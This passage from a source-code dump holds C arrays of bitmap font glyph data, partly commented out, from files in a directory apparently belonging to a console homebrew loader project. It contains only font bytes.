 25 | 	0x00, 0x42, 0x42, 0x66, 0x24, 0x3C, 0x18, 0x00, 0x00, 0x20, 0x60, 0x4A,
 26 | 	0x5A, 0x70, 0x20, 0x00, 0x00, 0x3E, 0x7F, 0x41, 0x59, 0x79, 0x3A, 0x00,
 27 | 	0x00, 0x3E, 0x7E, 0x50, 0x50, 0x7E, 0x3E, 0x00, 0x00, 0x7E, 0x7E, 0x52,
 28 | 	0x52, 0x7E, 0x2C, 0x00, 0x00, 0x3C, 0x7E, 0x42, 0x42, 0x66, 0x24, 0x00,
 29 | 	0x00, 0x7E, 0x7E, 0x42, 0x66, 0x3C, 0x18, 0x00, 0x00, 0x7E, 0x7E, 0x52,
 30 | 	0x52, 0x42, 0x42, 0x00, 0x00, 0x7E, 0x7E, 0x50, 0x50, 0x40, 0x00, 0x00,
 31 | 	0x00, 0x3C, 0x7E, 0x42, 0x4A, 0x6E, 0x2C, 0x00, 0x00, 0x7E, 0x7E, 0x10,
 32 | 	0x10, 0x7E, 0x7E, 0x00, 0x00, 0x00, 0x42, 0x7E, 0x7E, 0x42, 0x00, 0x00,
 33 | 	0x00, 0x04, 0x06, 0x42, 0x7E, 0x7C, 0x40, 0x00, 0x00, 0x7E, 0x7E, 0x18,
 34 | 	0x3C, 0x66, 0x42, 0x00, 0x00, 0x7E, 0x7E, 0x02, 0x02, 0x02, 0x02, 0x00,
 35 | 	0x00, 0x7E, 0x7E, 0x30, 0x18, 0x30, 0x7E, 0x00, 0x00, 0x7E, 0x7E, 0x30,
 36 | 	0x18, 0x7E, 0x7E, 0x00, 0x00, 0x3C, 0x7E, 0x42, 0x42, 0x7E, 0x3C, 0x00,
 37 | 	0x00, 0x7E, 0x7E, 0x50, 0x50, 0x70, 0x20, 0x00, 0x00, 0x38, 0x7C, 0x44,
 38 | 	0x46, 0x7E, 0x3A, 0x00, 0x00, 0x7E, 0x7E, 0x58, 0x5C, 0x76, 0x22, 0x00,
 39 | 	0x00, 0x24, 0x76, 0x52, 0x4A, 0x6E, 0x24, 0x00, 0x00, 0x40, 0x40, 0x7E,
 40 | 	0x7E, 0x40, 0x40, 0x00, 0x00, 0x7C, 0x7E, 0x02, 0x02, 0x7E, 0x7C, 0x00,
 41 | 	0x00, 0x78, 0x7C, 0x06, 0x06, 0x7C, 0x78, 0x00, 0x00, 0x7E, 0x7E, 0x0C,
 42 | 	0x18, 0x0C, 0x7E, 0x00, 0x00, 0x46, 0x6E, 0x38, 0x38, 0x6E, 0x46, 0x00,
 43 | 	0x00, 0x60, 0x70, 0x1E, 0x1E, 0x70, 0x60, 0x00, 0x00, 0x46, 0x4E, 0x5A,
 44 | 	0x72, 0x62, 0x42, 0x00, 0x00, 0x00, 0x7F, 0x7F, 0x41, 0x41, 0x00, 0x00,
 45 | 	0x00, 0x40, 0x60, 0x30, 0x18, 0x0C, 0x06, 0x00, 0x00, 0x00, 0x41, 0x41,
 46 | 	0x7F, 0x7F, 0x00, 0x00, 0x00, 0x10, 0x30, 0x60, 0x60, 0x30, 0x10, 0x00,
 47 | 	0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x40, 0x60,
 48 | 	0x30, 0x10, 0x00, 0x00, 0x00, 0x04, 0x2E, 0x2A, 0x2A, 0x3E, 0x1E, 0x00,
 49 | 	0x00, 0x7E, 0x7E, 0x12, 0x12, 0x1E, 0x0C, 0x00, 0x00, 0x1C, 0x3E, 0x22,
 50 | 	0x22, 0x22, 0x00, 0x00, 0x00, 0x0C, 0x1E, 0x12, 0x12, 0x7E, 0x7E, 0x00,
 51 | 	0x00, 0x1C, 0x3E, 0x2A, 0x2A, 0x3A, 0x18, 0x00, 0x00, 0x10, 0x3E, 0x7E,
 52 | 	0x50, 0x50, 0x00, 0x00, 0x00, 0x10, 0x3A, 0x2A, 0x2A, 0x3A, 0x3C, 0x00,
 53 | 	0x00, 0x7E, 0x7E, 0x10, 0x10, 0x1E, 0x0E, 0x00, 0x00, 0x00, 0x12, 0x5E,
 54 | 	0x5E, 0x02, 0x00, 0x00, 0x00, 0x02, 0x02, 0x02, 0x5E, 0x5C, 0x00, 0x00,
 55 | 	0x00, 0x7E, 0x7E, 0x08, 0x1C, 0x16, 0x02, 0x00, 0x00, 0x00, 0x42, 0x7E,
 56 | 	0x7E, 0x02, 0x00, 0x00, 0x00, 0x3E, 0x3E, 0x18, 0x1C, 0x38, 0x3E, 0x1E,
 57 | 	0x00, 0x3E, 0x3E, 0x20, 0x20, 0x3E, 0x1E, 0x00, 0x00, 0x1C, 0x3E, 0x22,
 58 | 	0x22, 0x3E, 0x1C, 0x00, 0x00, 0x3E, 0x3E, 0x24, 0x24, 0x3C, 0x18, 0x00,
 59 | 	0x00, 0x18, 0x3C, 0x24, 0x24, 0x3E, 0x3E, 0x00, 0x00, 0x3E, 0x3E, 0x20,
 60 | 	0x20, 0x30, 0x10, 0x00, 0x00, 0x12, 0x3A, 0x2A, 0x2A, 0x2E, 0x24, 0x00,
 61 | 	0x00, 0x20, 0x20, 0x7C, 0x7E, 0x22, 0x22, 0x00, 0x00, 0x3C, 0x3E, 0x02,
 62 | 	0x02, 0x3E, 0x3E, 0x00, 0x00, 0x38, 0x3C, 0x06, 0x06, 0x3C, 0x38, 0x00,
 63 | 	0x00, 0x38, 0x3E, 0x0E, 0x1C, 0x0E, 0x3E, 0x38, 0x00, 0x22, 0x36, 0x1C,
 64 | 	0x1C, 0x36, 0x22, 0x00, 0x00, 0x30, 0x3A, 0x0A, 0x0A, 0x3E, 0x3C, 0x00,
 65 | 	0x00, 0x22, 0x26, 0x2E, 0x3A, 0x32, 0x22, 0x00, 0x00, 0x00, 0x04, 0x3B,
 66 | 	0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00, 0x00,
 67 | 	0x00, 0x00, 0x20, 0x3B, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 68 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 69 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 70 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 71 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 72 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 73 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 74 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 75 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 76 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 77 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 78 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 79 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 80 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 81 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 82 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 83 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 84 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 85 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 86 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 87 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 88 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 89 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 90 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 91 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 92 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 93 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 94 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 95 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0xC0, 0x03,
 96 | 	// 0xE0, 0x03, 0xC0, 0x03, 0xE0, 0x01, 0xE0, 0x07, 0xE0, 0x03, 0xC0, 0x03,
 97 | 	// 0x60, 0x06, 0xC0, 0x03, 0x80, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x04,
 98 | 	// 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x03, 0xC0, 0x03, 0xE0, 0x03, 0xC0, 0x03,
 99 | 	// 0xE0, 0x07, 0x60, 0x06, 0x60, 0x06, 0x60, 0x04, 0x60, 0x06, 0x60, 0x06,
100 | 	// 0xE0, 0x07, 0xC0, 0x03, 0x60, 0x00, 0xC0, 0x03, 0x80, 0x01, 0x00, 0x00,
101 | 	// 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x03, 0x60, 0x00,
102 | 	// 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0x60, 0x03,
103 | 	// 0x60, 0x00, 0xE0, 0x06, 0xE0, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06,
104 | 	// 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0x60, 0x04,
105 | 	// 0xC0, 0x03, 0x60, 0x06, 0x00, 0x03, 0xC0, 0x00, 0xC0, 0x00, 0x00, 0x03,
106 | 	// 0xC0, 0x03, 0x00, 0x00, 0x60, 0x07, 0xE0, 0x07, 0xE0, 0x03, 0x60, 0x00,
107 | 	// 0x60, 0x06, 0xE0, 0x01, 0xE0, 0x01, 0x60, 0x00, 0xE0, 0x07, 0x80, 0x01,
108 | 	// 0x00, 0x03, 0xE0, 0x01, 0x60, 0x00, 0xE0, 0x07, 0xE0, 0x07, 0x60, 0x06,
109 | 	// 0xE0, 0x03, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x00, 0x80, 0x01, 0x60, 0x06,
110 | 	// 0x60, 0x06, 0x60, 0x05, 0x80, 0x01, 0xC0, 0x03, 0x80, 0x01, 0xC0, 0x00,
111 | 	// 0x80, 0x01, 0x00, 0x03, 0x60, 0x06, 0x00, 0x00, 0x60, 0x07, 0x60, 0x06,
112 | 	// 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0x60, 0x00, 0x60, 0x00, 0x60, 0x07,
113 | 	// 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0xE0, 0x01, 0x60, 0x00, 0x60, 0x05,
114 | 	// 0x60, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0xE0, 0x01, 0x00, 0x03,
115 | 	// 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x07, 0xC0, 0x03, 0x80, 0x01,
116 | 	// 0xC0, 0x00, 0xC0, 0x00, 0x00, 0x03, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00,
117 | 	// 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x03, 0x60, 0x00,
118 | 	// 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x60, 0x03, 0x60, 0x03,
119 | 	// 0x60, 0x00, 0x60, 0x04, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00, 0xC0, 0x03,
120 | 	// 0x60, 0x03, 0x60, 0x06, 0x80, 0x01, 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x06,
121 | 	// 0x60, 0x06, 0x80, 0x01, 0x60, 0x00, 0xC0, 0x00, 0x00, 0x06, 0x00, 0x03,
122 | 	// 0x00, 0x00, 0x00, 0x00, 0x60, 0x04, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x03,
123 | 	// 0xE0, 0x01, 0xE0, 0x07, 0x60, 0x00, 0xC0, 0x03, 0x60, 0x06, 0xC0, 0x03,
124 | 	// 0xC0, 0x01, 0x60, 0x06, 0xE0, 0x07, 0x60, 0x04, 0x60, 0x06, 0xC0, 0x03,
125 | 	// 0x60, 0x00, 0x00, 0x07, 0x60, 0x06, 0xC0, 0x03, 0x80, 0x01, 0xC0, 0x03,
126 | 	// 0x80, 0x01, 0x60, 0x04, 0x60, 0x06, 0x80, 0x01, 0xE0, 0x07, 0xC0, 0x00,
127 | 	// 0x00, 0x04, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x00, 0x00,
128 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
129 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
130 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
131 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
132 | 	// 0x00, 0x00, 0xC0, 0x03, 0x00, 0x00, 0xC0, 0x03, 0x00, 0x00, 0xE0, 0x07,
133 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
134 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
135 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
136 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
137 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
138 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
139 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
140 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
141 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
142 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
143 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
144 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
145 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
146 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
147 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
148 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
149 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
150 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
151 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
152 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
153 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
154 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
155 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
156 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
157 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
158 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
159 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
160 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
161 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
162 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
163 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
164 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
165 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
166 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
167 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
168 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
169 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
170 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
171 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
172 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
173 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
174 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
175 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
176 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
177 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
178 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
179 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
180 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
181 | 	// 0xC0, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00,
182 | 	// 0x80, 0x03, 0x00, 0x00, 0x60, 0x00, 0x80, 0x01, 0x00, 0x03, 0x60, 0x00,
183 | 	// 0xC0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
184 | 	// 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
185 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
186 | 	// 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0xC0, 0x03, 0x60, 0x00, 0xC0, 0x03,
187 | 	// 0x00, 0x06, 0xC0, 0x03, 0xC0, 0x00, 0xC0, 0x07, 0x60, 0x00, 0x00, 0x00,
188 | 	// 0x00, 0x00, 0x60, 0x00, 0x80, 0x01, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x03,
189 | 	// 0xE0, 0x03, 0xC0, 0x07, 0xE0, 0x03, 0xC0, 0x07, 0xE0, 0x07, 0x60, 0x06,
190 | 	// 0x60, 0x06, 0x60, 0x0C, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x07, 0x80, 0x01,
191 | 	// 0x80, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x06,
192 | 	// 0xE0, 0x03, 0x60, 0x00, 0xC0, 0x07, 0x60, 0x06, 0xE0, 0x03, 0x60, 0x06,
193 | 	// 0xE0, 0x03, 0xC0, 0x01, 0x00, 0x03, 0x60, 0x03, 0x80, 0x01, 0xE0, 0x0F,
194 | 	// 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00,
195 | 	// 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0x60, 0x0D, 0xC0, 0x03, 0x60, 0x06,
196 | 	// 0x00, 0x03, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
197 | 	// 0x00, 0x00, 0xC0, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0xE0, 0x07,
198 | 	// 0xC0, 0x00, 0xC0, 0x07, 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0xE0, 0x01,
199 | 	// 0x80, 0x01, 0xE0, 0x0F, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06,
200 | 	// 0x60, 0x00, 0xC0, 0x03, 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x0F,
201 | 	// 0x80, 0x01, 0xC0, 0x07, 0x80, 0x01, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00,
202 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00,
203 | 	// 0x60, 0x06, 0x60, 0x00, 0xC0, 0x00, 0x00, 0x04, 0x60, 0x06, 0x80, 0x01,
204 | 	// 0x00, 0x03, 0x60, 0x03, 0x80, 0x01, 0x60, 0x0D, 0x60, 0x06, 0x60, 0x06,
205 | 	// 0xE0, 0x03, 0xC0, 0x07, 0x60, 0x00, 0x00, 0x06, 0x80, 0x01, 0x60, 0x06,
206 | 	// 0xC0, 0x03, 0xC0, 0x07, 0xC0, 0x03, 0x00, 0x06, 0xC0, 0x00, 0x40, 0x00,
207 | 	// 0x80, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x07,
208 | 	// 0xE0, 0x03, 0xC0, 0x03, 0xC0, 0x07, 0xC0, 0x03, 0xC0, 0x00, 0xC0, 0x03,
209 | 	// 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x01, 0x60, 0x06, 0xC0, 0x03, 0x60, 0x0C,
210 | 	// 0x60, 0x06, 0xC0, 0x03, 0x60, 0x00, 0x00, 0x06, 0x60, 0x00, 0xE0, 0x03,
211 | 	// 0x00, 0x07, 0xC0, 0x07, 0x80, 0x01, 0xC0, 0x06, 0x60, 0x06, 0xC0, 0x03,
212 | 	// 0xE0, 0x07, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
213 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
214 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
215 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
216 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
217 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00,
218 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
219 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
220 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
221 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
222 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01,
223 | 	// 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
224 | 	// 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
225 | };
226 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/source/font.c:
--------------------------------------------------------------------------------
  1 | // #include <ctr/types.h>
  2 | 
  3 | // // const u8 font_bin[2640] = {
  4 | // const u8 __attribute__ ((section (".rodata")))  font_bin[] = {
  5 | // 	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x1A,
  6 | // 	0x78, 0x60, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00,
  7 | // 	0x14, 0x7F, 0x7F, 0x14, 0x14, 0x7F, 0x7F, 0x14, 0x00, 0x12, 0x3A, 0x6B,
  8 | // 	0x6B, 0x2E, 0x24, 0x00, 0x00, 0x63, 0x66, 0x0C, 0x98, 0x33, 0x63, 0x00,
  9 | // 	0x00, 0x26, 0x7F, 0x59, 0x59, 0x77, 0x27, 0x05, 0x00, 0x10, 0x30, 0x60,
 10 | // 	0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3C, 0x66, 0x42, 0x00, 0x00,
 11 | // 	0x00, 0x00, 0x42, 0x66, 0x3C, 0x18, 0x00, 0x00, 0x10, 0x54, 0x7C, 0x38,
 12 | // 	0x38, 0x7C, 0x54, 0x10, 0x00, 0x10, 0x10, 0x7C, 0x7C, 0x10, 0x10, 0x00,
 13 | // 	0x00, 0x00, 0x02, 0x0E, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x10, 0x10, 0x10,
 14 | // 	0x10, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x06, 0x00, 0x00, 0x00,
 15 | // 	0x00, 0x02, 0x06, 0x0C, 0x18, 0x30, 0x60, 0x00, 0x00, 0x3C, 0x7E, 0x4A,
 16 | // 	0x52, 0x7E, 0x3C, 0x00, 0x00, 0x02, 0x22, 0x7E, 0x7E, 0x02, 0x02, 0x00,
 17 | // 	0x00, 0x26, 0x4E, 0x4A, 0x52, 0x72, 0x22, 0x00, 0x00, 0x24, 0x46, 0x52,
 18 | // 	0x52, 0x7E, 0x2C, 0x00, 0x00, 0x18, 0x78, 0x68, 0x08, 0x7E, 0x7E, 0x08,
 19 | // 	0x00, 0x74, 0x76, 0x52, 0x52, 0x5E, 0x5C, 0x00, 0x00, 0x3C, 0x7E, 0x52,
 20 | // 	0x52, 0x5E, 0x0C, 0x00, 0x00, 0x40, 0x40, 0x4E, 0x7E, 0x70, 0x40, 0x00,
